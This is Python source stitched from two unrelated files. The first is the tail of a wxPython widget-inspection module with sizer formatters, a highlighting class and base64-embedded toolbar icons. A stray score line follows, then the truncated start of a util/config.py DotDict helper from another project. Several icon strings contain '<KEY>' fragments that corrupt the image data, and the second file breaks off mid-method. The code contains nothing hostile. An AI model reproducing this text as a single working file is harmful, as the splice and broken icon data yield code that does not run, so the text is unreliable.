st.append(self.Fmt('title', obj.GetTitle()))
if hasattr(obj, 'GetValue'):
try:
st.append(self.Fmt('value', obj.GetValue()))
except Exception:
pass
st.append(' child count = %d (direct) %d (recursive) %d (include TLWs)' %
(count, rcount, tlwcount))
if obj.GetContainingSizer() is not None:
st.append('')
sizer = obj.GetContainingSizer()
st += self.FmtSizerItem(sizer.GetItem(obj))
return st
def FmtSizerItem(self, obj):
if obj is None:
return ['SizerItem: None']
st = ['SizerItem:']
st.append(self.Fmt('proportion', obj.GetProportion()))
st.append(self.Fmt('flag',
FlagsFormatter(itemFlags, obj.GetFlag())))
st.append(self.Fmt('border', obj.GetBorder()))
st.append(self.Fmt('pos', obj.GetPosition()))
st.append(self.Fmt('size', obj.GetSize()))
st.append(self.Fmt('minsize', obj.GetMinSize()))
st.append(self.Fmt('ratio', obj.GetRatio()))
st.append(self.Fmt('IsWindow', obj.IsWindow()))
st.append(self.Fmt('IsSizer', obj.IsSizer()))
st.append(self.Fmt('IsSpacer', obj.IsSpacer()))
st.append(self.Fmt('IsShown', obj.IsShown()))
if isinstance(obj, wx.GBSizerItem):
st.append(self.Fmt('cellpos', obj.GetPos()))
st.append(self.Fmt('cellspan', obj.GetSpan()))
st.append(self.Fmt('endpos', obj.GetEndPos()))
return st
def FmtSizer(self, obj):
st = ['Sizer:']
st.append(self.Fmt('class', obj.__class__))
if hasattr(obj, 'this'):
st.append(self.Fmt('this', repr(obj.this)))
st.append(self.Fmt('pos', obj.GetPosition()))
st.append(self.Fmt('size', obj.GetSize()))
st.append(self.Fmt('minsize', obj.GetMinSize()))
if isinstance(obj, wx.BoxSizer):
st.append(self.Fmt('orientation',
FlagsFormatter(orientFlags, obj.GetOrientation())))
if isinstance(obj, wx.GridSizer):
st.append(self.Fmt('cols', obj.GetCols()))
st.append(self.Fmt('rows', obj.GetRows()))
st.append(self.Fmt('vgap', obj.GetVGap()))
st.append(self.Fmt('hgap', obj.GetHGap()))
if isinstance(obj, wx.FlexGridSizer):
st.append(self.Fmt('rowheights', obj.GetRowHeights()))
st.append(self.Fmt('colwidths', obj.GetColWidths()))
st.append(self.Fmt('flexdir',
FlagsFormatter(orientFlags, obj.GetFlexibleDirection())))
st.append(self.Fmt('nonflexmode',
FlagsFormatter(flexmodeFlags, obj.GetNonFlexibleGrowMode())))
if isinstance(obj, wx.GridBagSizer):
st.append(self.Fmt('emptycell', obj.GetEmptyCellSize()))
if hasattr(obj, '_parentSizer'):
st.append('')
st += self.FmtSizerItem(obj._parentSizer.GetItem(obj))
return st
class FlagsFormatter(object):
def __init__(self, d, val):
self.d = d
self.val = val
def __str__(self):
st = []
for k in self.d.keys():
if self.val & k:
st.append(self.d[k])
if st:
return '|'.join(st)
else:
return '0'
orientFlags = {
wx.HORIZONTAL : 'wx.HORIZONTAL',
wx.VERTICAL : 'wx.VERTICAL',
}
itemFlags = {
wx.TOP : 'wx.TOP',
wx.BOTTOM : 'wx.BOTTOM',
wx.LEFT : 'wx.LEFT',
wx.RIGHT : 'wx.RIGHT',
# wx.ALL : 'wx.ALL',
wx.EXPAND : 'wx.EXPAND',
# wx.GROW : 'wx.GROW',
wx.SHAPED : 'wx.SHAPED',
wx.STRETCH_NOT : 'wx.STRETCH_NOT',
# wx.ALIGN_CENTER : 'wx.ALIGN_CENTER',
wx.ALIGN_LEFT : 'wx.ALIGN_LEFT',
wx.ALIGN_RIGHT : 'wx.ALIGN_RIGHT',
wx.ALIGN_TOP : 'wx.ALIGN_TOP',
wx.ALIGN_BOTTOM : 'wx.ALIGN_BOTTOM',
wx.ALIGN_CENTER_VERTICAL : 'wx.ALIGN_CENTER_VERTICAL',
wx.ALIGN_CENTER_HORIZONTAL : 'wx.ALIGN_CENTER_HORIZONTAL',
wx.ADJUST_MINSIZE : 'wx.ADJUST_MINSIZE',
wx.FIXED_MINSIZE : 'wx.FIXED_MINSIZE',
}
flexmodeFlags = {
wx.FLEX_GROWMODE_NONE : 'wx.FLEX_GROWMODE_NONE',
wx.FLEX_GROWMODE_SPECIFIED : 'wx.FLEX_GROWMODE_SPECIFIED',
wx.FLEX_GROWMODE_ALL : 'wx.FLEX_GROWMODE_ALL',
}
#---------------------------------------------------------------------------
class _InspectionHighlighter(object):
"""
All the highlighting code. A separate class to help reduce the
clutter in InspectionFrame.
"""
# should non TLWs be flashed too? Otherwise use a highlight rectangle
flashAll = False
color1 = 'red' # for widgets and sizers
color2 = 'red' # for item boundaries in sizers
color3 = '#00008B' # for items in sizers
highlightTime = 3000 # how long to display the highlights
# how to draw it
useOverlay = 'wxMac' in wx.PlatformInfo or 'gtk3' in wx.PlatformInfo
def __init__(self):
if self.useOverlay:
self.overlay = wx.Overlay()
def HighlightCurrentItem(self, tree):
"""
Draw a highlight rectangle around the item represented by the
current tree selection.
"""
item = tree.GetSelection()
obj = tree.GetItemData(item)
if isinstance(obj, wx.Window):
self.HighlightWindow(obj)
elif isinstance(obj, wx.Sizer):
self.HighlightSizer(obj)
elif isinstance(obj, wx.SizerItem): # Spacer
pItem = tree.GetItemParent(item)
sizer = tree.GetItemData(pItem)
self.HighlightSizerItem(obj, sizer)
else:
raise RuntimeError("unknown object type: %s" % obj.__class__.__name__)
def HighlightWindow(self, win):
rect = win.GetRect()
tlw = win.GetTopLevelParent()
if self.flashAll or tlw is win:
self.FlickerTLW(win)
return
else:
pos = self.FindHighlightPos(tlw, win.ClientToScreen((0,0)))
rect.SetPosition(pos)
self.DoHighlight(tlw, rect, self.color1)
def HighlightSizerItem(self, item, sizer, penWidth=2):
win = sizer.GetContainingWindow()
tlw = win.GetTopLevelParent()
rect = item.GetRect()
pos = rect.GetPosition()
pos = self.FindHighlightPos(tlw, win.ClientToScreen(pos))
rect.SetPosition(pos)
if rect.width < 1: rect.width = 1
if rect.height < 1: rect.height = 1
self.DoHighlight(tlw, rect, self.color1, penWidth)
def HighlightSizer(self, sizer):
# first do the outline of the whole sizer like normal
win = sizer.GetContainingWindow()
tlw = win.GetTopLevelParent()
pos = sizer.GetPosition()
pos = self.FindHighlightPos(tlw, win.ClientToScreen(pos))
rect = wx.Rect(pos, sizer.GetSize())
dc, dco = self.DoHighlight(tlw, rect, self.color1)
# Now highlight the actual items within the sizer. This may
# get overdrawn by the code below for item boundaries, but if
# there is border padding then this will help make it more
# obvious.
dc.SetPen(wx.Pen(self.color3, 1))
for item in sizer.GetChildren():
if item.IsShown():
if item.IsWindow():
r = item.GetWindow().GetRect()
elif item.IsSizer():
p = item.GetSizer().GetPosition()
s = item.GetSizer().GetSize()
r = wx.Rect(p,s)
else:
continue
r = self.AdjustRect(tlw, win, r)
dc.DrawRectangle(r)
# Next highlight the area allocated to each item in the sizer.
# Each kind of sizer will need to be done a little
# differently.
dc.SetPen(wx.Pen(self.color2, 1))
if isinstance(sizer, wx.WrapSizer):
for item in sizer.GetChildren():
ir = self.AdjustRect(tlw, win, item.Rect)
dc.DrawRectangle(ir)
# wx.BoxSizer, wx.StaticBoxSizer
elif isinstance(sizer, wx.BoxSizer):
# NOTE: we have to do some reverse-engineering here for
# borders because the sizer and sizer item don't give us
# enough information to know for sure where item
# (allocated) boundaries are, just the boundaries of the
# actual widgets. TODO: It would be nice to add something
# to wx.SizerItem that would give us the full bounds, but
# that will have to wait until 2.9...
x, y = rect.GetPosition()
if sizer.Orientation == wx.HORIZONTAL:
y1 = y + rect.height
for item in sizer.GetChildren():
ir = self.AdjustRect(tlw, win, item.Rect)
x = ir.x
if item.Flag & wx.LEFT:
x -= item.Border
dc.DrawLine(x, y, x, y1)
if item.IsSizer():
dc.DrawRectangle(ir)
if sizer.Orientation == wx.VERTICAL:
x1 = x + rect.width
for item in sizer.GetChildren():
ir = self.AdjustRect(tlw, win, item.Rect)
y = ir.y
if item.Flag & wx.TOP:
y -= item.Border
dc.DrawLine(x, y, x1, y)
if item.IsSizer():
dc.DrawRectangle(ir)
# wx.FlexGridSizer, wx.GridBagSizer
elif isinstance(sizer, wx.FlexGridSizer):
sizer.Layout()
y = rect.y
for rh in sizer.RowHeights[:-1]:
y += rh
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
y+= sizer.VGap
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
x = rect.x
for cw in sizer.ColWidths[:-1]:
x += cw
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
x+= sizer.HGap
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
# wx.GridSizer
elif isinstance(sizer, wx.GridSizer):
# NOTE: More reverse engineering (see above.) This time we
# need to determine what the sizer is using for row
# heights and column widths.
#rh = cw = 0
#for item in sizer.GetChildren():
# rh = max(rh, item.Size.height)
# cw = max(cw, item.Size.width)
cw = (rect.width - sizer.HGap*(sizer.Cols-1)) / sizer.Cols
rh = (rect.height - sizer.VGap*(sizer.Rows-1)) / sizer.Rows
y = rect.y
for i in range(sizer.Rows-1):
y += rh
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
y+= sizer.VGap
dc.DrawLine(rect.x, y, rect.x+rect.width, y)
x = rect.x
for i in range(sizer.Cols-1):
x += cw
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
x+= sizer.HGap
dc.DrawLine(x, rect.y, x, rect.y+rect.height)
# Anything else is probably a custom sizer, just highlight the items
else:
            del dc, dco
for item in sizer.GetChildren():
self.HighlightSizerItem(item, sizer, 1)
def FindHighlightPos(self, tlw, pos):
if self.useOverlay:
# We'll be using a ClientDC in this case so adjust the
# position accordingly
pos = tlw.ScreenToClient(pos)
return pos
def AdjustRect(self, tlw, win, rect):
pos = self.FindHighlightPos(tlw, win.ClientToScreen(rect.Position))
rect.Position = pos
return wx.Rect(pos, rect.Size)
def DoHighlight(self, tlw, rect, colour, penWidth=2):
if not tlw.IsFrozen():
tlw.Freeze()
if self.useOverlay:
dc = wx.ClientDC(tlw)
dco = wx.DCOverlay(self.overlay, dc)
dco.Clear()
else:
dc = wx.ScreenDC()
dco = None
dc.SetPen(wx.Pen(colour, penWidth))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
drawRect = wx.Rect(*rect)
dc.DrawRectangle(drawRect)
drawRect.Inflate(2,2)
if not self.useOverlay:
pos = tlw.ScreenToClient(drawRect.GetPosition())
drawRect.SetPosition(pos)
wx.CallLater(self.highlightTime, self.DoUnhighlight, tlw, drawRect)
return dc, dco
def DoUnhighlight(self, tlw, rect):
if not tlw:
return
if tlw.IsFrozen():
tlw.Thaw()
if self.useOverlay:
dc = wx.ClientDC(tlw)
dco = wx.DCOverlay(self.overlay, dc)
dco.Clear()
del dc, dco
self.overlay.Reset()
else:
tlw.RefreshRect(rect)
def FlickerTLW(self, tlw):
"""
        Use a timer to alternate a TLW between shown and hidden state a
        few times. Used to highlight a TLW, since drawing and clearing an
        outline is trickier.
"""
self.flickerCount = 0
tlw.Hide()
self.cl = wx.CallLater(300, self._Toggle, tlw)
def _Toggle(self, tlw):
if tlw.IsShown():
tlw.Hide()
self.cl.Restart()
else:
tlw.Show()
self.flickerCount += 1
if self.flickerCount < 4:
self.cl.Restart()
#---------------------------------------------------------------------------
from wx.lib.embeddedimage import PyEmbeddedImage
Refresh = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABehJ"
"REFUSImdll1olNkZx3/vRzIxk5lJbMwmGHccP+JHS6VrYo3TKCvL0i0LLTRB8cbLitp6p9ib"
"elHohVLT0BqXBnetqBQveiWF0oXiF+1FS4PUxFgbm0yYTN/JZL4nmcl7/r3IJMRlodAHDhwO"
"z8d5/uf/PM+x+N9yADgDfAtwAAvwgafAJ8DfvsxIq3q4G86cuiHAB8C/gZLjOO/4vv8u8LWu"
"rq4lgGQy2dTQ0JDZuXPn9snJyXmgGYgBnwMGcCzwBZb7BedbgJ+5rntk69atJdd1f/D69evX"
"tm1bAwMDDA4ONlmWxYMHD5iYmGj0fT8BhGOx2Cezs7MdKysrfwZ+DCTXgmzMaovjOPdXs1tf"
"nwJXgX8ODQ0plUqpXC7r9OnTAmZDodDNtra2zzba2Lb9AOj8MtjGAIVCIfX29ppDhw6Z1tZW"
"AWpvb9fNmzf9dDqtUqmksbExPxQKCdC+ffvU29ur3t5eEw6H1wL9po7KunzgOM4/AB08eNBM"
"TU3J8zxdunRJtm3r4sWLkqRCoaBkMilJunz5smzb1oULFzQ/P6/p6Wn19/cbQK7rvgQ+2hig"
"Z/v27c8A9fX1yfM8JRIJJZNJzczMKJVKqVQqKZ/PK5fLqVgsKpVKaWZmRslkUolEQouLixoY"
"GDCAotHo34H9bEijMZvNft7W1hYJBAJf9zyPeDxOR0cHoVCIxsZGarUalmVhWRbGGILBIJFI"
"<KEY>"
"<KEY>"
"<KEY>"
"4vG4Tp48qdHRUV+SisWicrmcJOnp06d6//<KEY>"
"BwcHdfz4cdm2rbpvXnR1dVVGRkaUy+WUz+eVTCbX95J07949NTQ0bOS6bt++LUnK5/PK5/Mq"
"<KEY>pVIaHR1Vd3f3MvDCZa1nuC6+72NZFsFg8K0CkbQOA4AxBmPMWzrFYpFwOIxlWdi2"
"jWVZAJYD/KhUKr2ztLTE48ePWVpaMocPH7Z838cYQyAQIJ/P8+rVK2ZnZ5HEkSNHGBoaIhqN"
"sry8jG3bbN68mfv375uRkRHr2bNnjI+PO0DKAq4AvbZtNxljdnR0dMTOnDnDuXPnCIfDABQK"
"BSYnJ5mensYYw44dO9i7dy/hcBhJVCoVRkZGGB4eJpfLzXV2ds5mMpmVarX6AqDDcZzj9cL4"
"+f9L0+bmZgEKh8O3enp6+vbs2fN94D0HKEmqxWKxYDabPRqJRN47e/YsAwMDBINBXNfFGEOl"
"UqFarVKtVtdhCQQCACwvL1Or1VhcXKRUKk3Ozc39cWFh4V/Ay7U32rWxVczPzyuRSMjzPHme"
"<KEY>"
"daLRKFevXqWlpYVyuQxAS0sLN27cIBqNcu3aNZqamlhaWkKSABKJxBYgZoEQWEOrPenTOobq"
"7+838Xjc7N+/X4BaWlo0Njbm5/N5ZbNZ3blzx+/s7BSg1tZWxeNxxePx9fYO3AUaV69brwOg"
"qz4s1guqtbX1t+Fw+NfA7IkTJ5TL5ZTJZHTq1CkBb4BfAp9ttHFd93dA95pvF+AgNPwVksaY"
"HwIV13W/2d3dnX/z5s1Pd+/e7TQ3N+9LJpPdd+/exXVdPM/Dtu2XxpiRWCzWJOmrc3NzbbVa"
"7S8rKyuXgASrqBh+AnY9i43z+aM6bbf29PR8LxAI/AlQd3f38rZt25YdxxHwB8dxvg28C+wF"
"vrMOS30MrGdwBSytDmgLMBb8fo1eU1NT7cAE8JVEIrHx2zLt+/5/gJm66mT9oharPwsL4L/1"
"GXlKb/xX4wAAAABJRU5ErkJggg==")
Find = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABgRJ"
"REFUSIm1lU1oG9sVx/9z5440+kBWJUvGDZESXuskZPMIwVaoybNp4niXEChdJPDAIWk+IGnA"
"i1Ioz9208apk10WcZFMI3Zgugrww6cNxKcakdoK/ghU7k5EsW2PLljXfc2duFw/5uaRv1x4Y"
"uHc4c3/38P+fM8D/OYTDm7Gxsd/4vv/H169fQ5IkAIDjODh16hSy2ey3t27d6geAJ0+eFDVN"
"G1xYWEA4HAYAeJ6H3t5eUEp/f+PGjZHPSOPj48P37t1j+XyeAzh4QqEQLxQK/Pr1639v5V67"
"dq3Y29t7kEMI4aIo8lwux2/fvs3Gx8d/28qlrYXv+18RQsTNzU129epVWigUUC6X8fz5c8zN"
"zUEQBKuVu7a2Zs7MzOD06dO4c+cOJicnUavVMDs7ywRBoIyxfgB/+A8ApXS7Xq8jkUjQCxcu"
"4MqVK1hbW8OrV6/w6dMndHV1fXHmzJmvCSGs2WyeePPmDU6ePImbN2+CUgpVVVEqleju7i4o"
"pdufVSDLMhhj0DQNMzMz2Nragu/72N7ehizLLJ1Od3me91wQBKRSKSSTSW9+fl56/PgxFhcX"
"IQgCNE2DbdsIhUL4DOC6LjjnIIRAFEXU63VYloUgCBAEAVUUJTBN0wGAWCwW5pxLtm1jdXUV"
"mqYhnU4fGIMxdgAgrcWHDx+aiqJAFEVks1l4nodisQjHcdDT04NsNvuPYrEYLRaL0Ww2++rc"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>/+/a2pqalFCgDhcPhjpVL50jRNWigU0N/fj0uXLkFVVayvr9OFhYVSNBot"
"p1KpPgAol8tTjUajI5/PnxgYGIAoitB1HdVqFe/fv/dyudxPG43GXwD8FQDw8OHDuVQqxQcG"
"BnitVuOGYfD19XU+PDzM29raOIBhAJFDDZgEcLuvr48risKbzSbXNI2PjIxwWZZ5LpfjDx48"
"WD5wESEElFLoug5VVRGJRFAqlaDressZDIB7qPE9AL7jOFBVFYZhYGNjA3t7e5AkCYIggBDy"
"vU0dx3FM04Smadjc3IQsy1heXoZpmq1Z8ysAg4cA4wB+7DgOKpUKPM/DysoKdnZ2YJomJEmC"
"4zguAIhjY2MjL168+DmAeKFQQGdnJ2zbRrVaRb1ex/Lyssc57+jp6fnJ8ePHkc/ncfTo0S/K"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"EAQBoVAInufBsr4bvJIkodUHKJVKkGUZrutid3cXhmHA9338UFBKYRgGVldXEQqFYJomLMvC"
"<KEY>"
"y7K+t2kkEkEQBFBVNVhaWiLRaBTxeByKoiAIAtRqNT+dTosA2g8d3k4pRb1e9+fn58V0Og1V"
"VdFsNsE5h6Ioge/7JBKJgFqWNX/kyJETGxsbkampKXDOEQTBQYmSJInxeBwAploAQsjrWCx2"
"VpIkcXJyEr7vQ5Kkw7qRzs5Ox7KsZQEAhoaG5iKRyJctcQ5HIpFAo9H487Nnz+4cfj80NPSn"
"RCLx6/39/c++kWUZtm2vPH369NQPivi/in8Df18XwyUA5+QAAAAASUVORK5CYII=")
ShowSizers = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABChJ"
"<KEY>"
"RhcirkSpigSECl0WBa104UKoSIoLS8TWlja1NTOTyUzz5s37uNdFWpumJSktHriry//8zj38"
"z7nwP4dY5/7BUqn0quu62621i9cJhSjGcTzTarUOAr/dFn1sbGy/N+SdksgoQ2bh2mFBQpTz"
"vdP1ev3AWjkya10qpe4yPbPZ3GeUecEMswQoYK4I3w+wzWiz3qgbtw0AQoHoswWfNxyYLYE2"
"8GcVfr8IzU5gjOnfCWA5YuCvHPw0CRkLhGDjW5LeGiAFWjGcaYKyUHLAwvoeWQcgpczZjM3z"
"A3CiD5fPAlikFXRicNy8lNJbK4das/A0VdKVJd/4oWqJZhSGVcJUeH3n5JA/NGe1OhEG/W+i"
"KJq9LUAURe1KuVJQrrqnn4YVrXXkOE5gFCpf8NteLvdts9k8AgRXJDf0bC1ArlgsTiVJsqfX"
"6+1K03RQLpenfd//tdvtbh0MBvdaaxe01pcGg8FFlq1wU8jNoqiUeq5Wqx3SWlutdWvTpk3v"
"ANuBbY1G423Xdecdx7EjIyOHlVLPA6X1kl4lK6XU7rGxsU+UUkue54XlcvlL4LEVL36kUql8"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"Xq8fk0IkCGVxci2UnsfNz1MatSDtUN7rT0xMvLa6lePj4/v8wlAfsCVUuJFMZxh1eQMqyIFF"
"irRerx/LGGMCYa3ioV1f8el30/w4k8V178bNfMjHL3mcPREA0U1MES3ZNK2R6Z9katpgkpBU"
"jFLovcnJRz8QF54wxgTXVoUQl9iBzz/bniQlT39JIdecQywICfEwQwFkd4KqdAmDS8gKEMLK"
"XZTaOVImsbyOpM1QXiPkmgBAZBApeOEsS5OSjD8gJYsG6AFkhBA5C3D6+G72vudTGYXg8gYQ"
"0J6DDB4sK67LLISjhXQ6xLm3+OXxU6RuBGxEM0sPLFkhRC5jjDmntD5D2N4jDr8LsMCV+bCQ"
"t8Xhs0mStFYD4jhu55B/LEpx//vi/A5gieWdJLBoV+m2MeacAJ6uVqt7pZQNa+11v5MQohAE"
"wdFut/sFcH4VY9T3/X2+7z9lre2t0mXTNP17fn7+6/V6fMfxL1klnkaQRVDaAAAAAElFTkSu"
"QmCC")
ShowFilling = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAZ5J"
"REFUSIntlc9KAkEcxz+tu7OxLRSuGUXtIfUpukW9QJcO3nqELoLXLr2Bt47dRBAqgxJ6BqMw"
"PJe0FEliaLNrFxV1zXatY9/TMDPf72eG3/yBf/2guaH2DrALrADtGfME8AKUgCsAdWhwX1XV"
"bSnlMtCZEaApivrqeXJxEmBDSrl+dHQoNjf3OD9/xjSDJ5vmMre3Z1xeHi8AG/3+YcAH8GEY"
"SbG6uoVtP2IYwQFLS2s8PT0MciYBALi5uUfTrrEsB88LDtB1C027A+h+N6cAvBUK+e6surg4"
"6wLvvSwAlHFKu/0ZfNkBvD6AEGJmwCSvrwaNRgOAZrMZKtw0zYF3KiCXy1Eul2m1WqEAhmFQ"
"q9VgrMg+QKVSoVqt4oU5QoCiKHQ6/vvpA2QyGdLpNPV6PRQgHo+Tz+fJZrPTAYlEgmQyiW3b"
"oQBCCFKpFIy+b36ArusDQ1j1vCM18B3TaDQaOrgvy7Jgyg7mgflisQiA4zihwmOxGKVSCUDv"
"ZTFOO/mL5zoSiby6rnsFHMDoDk6llA6//HBc1+1/OP8Kpi8497f1tG0HzQAAAABJRU5ErkJg"
"gg==")
Icon = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAAALhJ"
"<KEY>"
"McvCEIBdm3F7/fr0FKgBRFaIrHkAdykdQFmEGm2HL233BAIAYmxYEqjePo9SBYBvBKppclDz"
"prMcqAhbAtknJx+3AKRHgGhnv4iApQY+jtSWpOY27BnifNt5uyk9BekAoZNwl21yDBSBi/63"
"yOMiLAXaf8AuwP9n94vzaTYBsgHeht4lXXmb7yQAAAAASUVORK5CYII=")
CollapseTree = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAf9J"
"REFUSIm9lD9r20AYhx9Fxe5SKDIynVJodFMaChkC6eBCJ+WWdulSb1o6RR8gH6AfQF5aSksX"
"aQ0eajwVkinO1MFk0YXg0uLSISZDoQhcddAf5MR241buD4670/tyD+/vXh0sWdqUb1vAQ2Bj"
"Suwb0E7Xx38DaAKPgTuAnJLfSSEAn4DWIoAm8ByQruti2zYAlmUBoJSi2+3ieV4R1v0TJANs"
"AS8Ap9PpYFkWUSSuJFcqIUopAKSUAO+A18yxS0/nZ8AD13WFbdtEkWB9Hep1ODqC0QgMA8bj"
"<KEY>4/<KEY>"
"<KEY>"
"BD8Kh1cqIbp+ThAEVKtVBoNBCziZBfjX/wDgEHg0C7D0O8gs+grcAm76vi80TcM04eJCYZqg"
"6+ecnR0TBAGu6+L7PlJKhAgJQ+6SvF/vrwNsAm+BD0B8eTQajXztOMT7HnFrL48fpGNCizzX"
"Q5IXdDfdN/Y92Hna5s2rJ+y+zPPm3skiOoCkip+f23Fr70o1pWgCkoGKkKV3URnKqyjaxTKs"
"omCX4+SQ0pS1aew4xJub5VZwGZQdfv83yOfTR/iA1xwAAAAASUVORK5CYII=")
ExpandTree = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAepJ"
"REFUSIm1lDFr20AYhp+ri+iSxUUhW4dIU9wlQ4YOKnRSj4K7Z9NSCFg/ID+gP0BZWkpLF3kN"
"Giq0pkOpMxWSTFIIFIqHQCFbUQnXQTpFslXXptYLx90nvdzD9913Bx1LtHzbA54Aj1v+nQFf"
"yvXpMoD7M/E+8AzYAmSLP66BbSBcBTACXED6vo/rugBYlgVAlmUkSSKDIND+rXJeCNEl2gNe"
"AV4cx1iWRZ7bc2bDSMmyDAApJcAH4C0LytUr5wPA8n3fdl2XPLfZ2YHNTbi+vjPf3j7ENKHf"
"<KEY>"
"8XBYZDLrXQnQhRoA3SEAUaSIItWIz89Vm3e6DOAMiJMkwTBSALa3i6Gl14aRYhgpSZLgOA7A"
"t0WA/70HAJ+Bp//KoDPpi/YD2AAehGFoCyEwTbi5yTBN6PV+cnV1yng8xvd9wjBESoltp6Qp"
"jyjer4/LAPeB98AnQM0Ox3GqteehjgPU0WH1/6QcDa3yXE8pDnRUxs5xAM9fRrx7M2T0uvIt"
"PJNVdAJFFr++R+rocC6btagB0aA6pPMuWoeqLOrlootSUSuX51WQtUm3qfI81O7uejOYBenN"
"X/wBVz/ONKbGYPkAAAAASUVORK5CYII=")
HighlightItem = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAAAQZJ"
"REFUSInFlTGSgjAUhv8XuIRl9ga0XgmuoI5abwfH8Ai22GlJZ0otuQD5t3DZ1V1CwgzgP8OQ"
"QCZfkv+9FxEVYUrFbYO2oW+wqEiGAtRzhyRIQh9eH+RXAMBmvfIuohcwheLnTnZ6vM3NjAaQ"
"1mTahvrAHwCzj+BJVI83sesHAMjRM3OVgNkFm/WK292+EzKvB86zr5Lu76b2AubdAbqMda0+"
"UOIqFdY2lKMHYGrw06DL3Tbrxzmi/Iq0JNLyO/Pxm/Uze/BXVRIUKajvKM6AXuh/kfjeHTC7"
"TAdw1RfahmlJFOewgtjvQY/0QgeNe3MUOVQsw2/OwQBRkQy5Op2lYixN7sEXVhRd4PXVHvwA"
"AAAASUVORK5CYII=")
EvtWatcher = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABHNCSVQICAgIfAhkiAAABwxJ"
"REFUSIltlltsXFcVhr+zzzlzztw949vMxGPHl3Hiqk6I07RJhcBGoUK0VSuaSFwahAChSkiV"
"QCotlQAJP/FAeKFPSChRJUAtqZACjUpJBCqUlEY0l7HjpraT+DKejDPjmfHcznXz0Bg1iPWy"
"ttbD/629tbT/pXB/KIAEVCADxIBdwMi93AX4QBlYA5aBIlADNvg/oXzirAIeoAcCgVFN0460"
"Wq0DuVzuc7VaLVspl52xsTHN9TwWFxfdbDarKYqysLKy8tdYLHalXq9fBG7fa0Dcy/8F7BSi"
"hmEcdF33Cc/znt63b1//1NRUMBQKqeFolOHRMTzbYmlxEcdx2Nrast+7eNFaWl6+bZrm667r"
"<KEY>/VarUTmqY9MTMz03vs2HFS/X1eOjvojmUHFM22sIMRXN/nxlxe"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"C+U011YM3gvojCwskZAOzclxkgFDCYZCyv79+735+fnuUqkUjUQii51Op6YCWcdxnsiNjR0+"
"fuKE+cUjR+Sg7wurt5eA6bB2I8b3/1Hn3EKFY+UYzS2H2Y1bbFlpDuaydJsbBAo1woMDaLqO"
"lFIpFApsbGysxGKxD1XgwJ7x8ecOPPLI4NMPP+w9ODqq2uEwkSvLrJWzfP5PS/SoJb7xpSy/"
"GNUJd6noWoK3bn1E+a7D4XiaaJ+FpwWpVatKu9Vyt5vNrmaj4ZZKpUsCGCkWi/1d8TiZ3cMS"
"VcHvWLyvJHj2gy0mBz1+/7VJHvRXmDv5dc6e/jF1c4HUeJjXS02ev9HhcjCDY2ok0ymGRkak"
"qigU79xJCyFGNGBXrV4XXaEQxsiI4mnglRv8OZbjxvYax2cGaEfavPnTU/CrV1kH1qv/5Oi3"
"<KEY>"
"<KEY>"
"<KEY>"
"JeALoLy0vOzevL5AvbsLPJPEu9exd8NPomtcr3jseupJeOYxcCyQEp47wa7Dh3hrq8PJ3iLa"
"uABVQVU1LMeR1+fnKZVKlmmamxqwtiuT8betDvXFRUlmEMZ7eDzZ4vrGCK9duUx/LsL0t37N"
"+sQ7aIZB6tHPkF8pYJeafDfdw5Pr8/j9uymUNvlwfl5quk4ymbQrlcqKBiwJIZaqtVpvcXVd"
"jA4OSW9olzJuW/xcKxJWDV5d1Ulne/jqp79Mx4U3i228lQDP70nyvf0msZaPVymzcrcsC8Wi"
"aGxvI4T4CFhSgWC9Xk90ms29vcPD4eHJSS9gu0JtO8Q6qxwaHmYpFmF5ZZPHb0VQq5Lzosg3"
"H0jzwsEg+qhLM9GLslGg4jj+uQvn1fNvv32rVCqdicfjH6iAHg6HzVKpNNWoVvt6+/tlJBAQ"
"<KEY>X+/<KEY>"
"<KEY>"
"<KEY>"
"pPjSQ8VD85r43XGMaIzKZlmura95Fy9eFLOzs9RqtX8JId5wXfeP8PFk7wAUoBQMBu86jhOs"
"<KEY>/BcjzZDGjybrPl5/Nz3rWrV+XZs2e1U6dO+Xfu3MkLId7QNO01"
"<KEY>"
"XC4WiwuGYZyRUp63bfsm4O5oftL0dyAiGAxmDMM4UK1WJ<KEY>"
"<KEY>"
"<KEY>
| 1.914063 | 2 |
util/config.py | entn-at/AGAIN-VC | 78 | 12761609 | <gh_stars>10-100
import os
import yaml
class DotDict(dict):
"""
a dictionary that supports dot notation
as well as dictionary access notation
usage: d = DotDict() or d = DotDict({'val1':'first'})
set attributes: d.val2 = 'second' or d['val2'] = 'second'
get attributes: d.val2 or d['val2']
"""
__getattr__ = dict.__getitem__
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
    def __init__(self, dct=None):
        # a mutable default argument would be shared across instances
        if dct is None:
            dct = {}
        for key, value in dct.items():
if hasattr(value, 'keys'):
value = DotDict(value)
self[key] = value
def __getstate__(self):
return self.__dict__
def __setstate__(self, dct):
